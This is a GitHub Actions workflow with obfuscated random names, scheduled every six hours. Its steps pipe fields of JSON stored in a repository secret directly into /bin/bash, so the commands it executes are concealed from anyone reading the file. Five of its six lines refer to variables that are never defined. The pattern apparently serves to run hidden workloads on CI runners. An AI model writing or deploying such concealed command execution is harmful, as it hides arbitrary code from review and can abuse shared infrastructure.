name: xianghuaguo3451

on:
  workflow_dispatch:
  schedule:
    - cron: '8 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          cbsny7: ${{ secrets.cbsny7 }}
        run: |
          echo $cbsny7 | jq -r .b07 | /bin/bash
          echo $okne397 | jq -r .prdc960 | /bin/bash
          echo $utamk465 | jq -r .k3 | /bin/bash
          echo $avbcu24 | jq -r .xukj43 | /bin/bash
          echo $n55959 | jq -r .agcmf66011 | /bin/bash
          echo $ne9790 | jq -r .f32 | /bin/bash

